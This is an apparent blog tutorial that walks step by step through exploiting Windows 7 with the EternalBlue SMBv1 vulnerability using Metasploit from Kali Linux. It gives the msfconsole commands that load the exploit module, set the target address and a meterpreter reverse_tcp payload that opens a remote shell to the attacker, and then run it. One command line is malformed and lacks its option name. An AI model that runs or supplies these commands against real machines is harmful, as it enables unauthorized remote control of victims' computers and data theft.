exploit windows PC using eternalblue smb remote windows kernel pool corruption

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv! SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered.

Attacker: Kali Linux

Target: window 7

 Open the terminal in your Kali Linux type msfconsole to load metasploit framework.

msfconsole

use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8

msf exploit(ms17_010_eternalblue) >set 192.168.1.21

msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) >exploit

From screenshot you can see we have got meterpreter session after buffer overflow exploited by overwriting SMBV1 buffer.

Meterpreter> sysinfo

About mahyar

OrcID: 0000-0001-8875-3362 PhD Candidate (National Academy of Sciences of Ukraine - Institute for Telecommunications and Global Information) MCP - MCSA - MCSE - MCTS MCITP: Enterprise AdministratorCCNA, CCNP (R&S , Security)ISO/IEC 27001 Lead Auditor

Check Also

Post Exploitation Hacking Techniques

we’ll talk about post exploitation hacking techniques you can use after having a meterpreter shell …